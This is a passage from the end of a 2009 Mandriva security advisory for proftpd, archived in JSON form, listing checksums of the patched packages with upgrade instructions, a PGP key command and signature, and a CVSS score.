mes5/x86_64/proftpd-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 786d17db075a16940d7a1970bd3bb5e7 mes5/x86_64/proftpd-devel-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 3e453ed771a0b87e83a65e2d519f74b3 \r\nmes5/x86_64/proftpd-mod_autohost-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 028689776ee4070201f576cb5bc43817 mes5/x86_64/proftpd-mod_ban-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 18f8e72e3c153f363df5a3c801653196 mes5/x86_64/proftpd-mod_case-1.3.2-0.4mdvmes5.x86_64.rpm\r\n a85176fbdd6cdf97959d16c591bbdb4a \r\nmes5/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 5fc16355fed589ee81f3a91edf971d34 mes5/x86_64/proftpd-mod_gss-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 84407e0d9a98d6fc1df92b0f0ebe707d \r\nmes5/x86_64/proftpd-mod_ifsession-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 158cb04b200c2d3c4695bf0f52cf1ac1 mes5/x86_64/proftpd-mod_ldap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n cf103f660b82e65c126522a062652104 mes5/x86_64/proftpd-mod_load-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 7ec1019d08d8346a4cf610a3d323b234 \r\nmes5/x86_64/proftpd-mod_quotatab-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 6952dfbef25c19c4078d88562ddc5a5a \r\nmes5/x86_64/proftpd-mod_quotatab_file-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ddf6388392f885857649c959f53d5f57 \r\nmes5/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 4c79e36c689ee1106e058a4267613c41 \r\nmes5/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 0dc81114692e6556b75b7173bcc29b23 \r\nmes5/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 57309c9b341d3e0e33592c8f1972b964 mes5/x86_64/proftpd-mod_radius-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 9211a258846d7c26a0763ac14125669d mes5/x86_64/proftpd-mod_ratio-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 46a8bc1b19a11a94351293cd41c886ee \r\nmes5/x86_64/proftpd-mod_rewrite-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 1afddfeccf086fabc8985fb51562eb36 mes5/x86_64/proftpd-mod_shaper-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ba08b0aa1ecbe72fec308fc64f9601e4 \r\nmes5/x86_64/proftpd-mod_site_misc-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 7048d53a7b8d7a91d0364fc73206783c mes5/x86_64/proftpd-mod_sql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ccfc7ff7a7dfd430bbb4f531bbd5f2d7 \r\nmes5/x86_64/proftpd-mod_sql_mysql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 2c21fa4038914aa6127f1ca5a905b50d \r\nmes5/x86_64/proftpd-mod_sql_postgres-1.3.2-0.4mdvmes5.x86_64.rpm\r\n bf98fec5f6167f77fdc11431f0eadfde mes5/x86_64/proftpd-mod_time-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 503696b82de33085447527a0ece12b72 mes5/x86_64/proftpd-mod_tls-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 5910d34c9b33b82b889495148019b57f mes5/x86_64/proftpd-mod_vroot-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 189989e62986c53d1132bac4fcf5d55a mes5/x86_64/proftpd-mod_wrap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n deb92c92045b7f39c06ab2537b36c35d \r\nmes5/x86_64/proftpd-mod_wrap_file-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 512eeb68347e31174846d2825ae2069e \r\nmes5/x86_64/proftpd-mod_wrap_sql-1.3.2-0.4mdvmes5.x86_64.rpm \r\n 096a513d6a8b30b1a35e6fe1db6e502e mes5/SRPMS/proftpd-1.3.2-0.4mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLMK6AmqjQ0CJFipgRAjj1AJ4gDdbY1CsNcLb5TXdAZYtMjk9EQACg5Mnd\r\nrRXKi0zMkqfD5bNJDudoE2w=\r\n=1SEX\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-12-22T00:00:00", "published": "2009-12-22T00:00:00", "id": "SECURITYVULNS:DOC:22982", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22982", "title": "[ MDVSA-2009:337 ] proftpd", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}
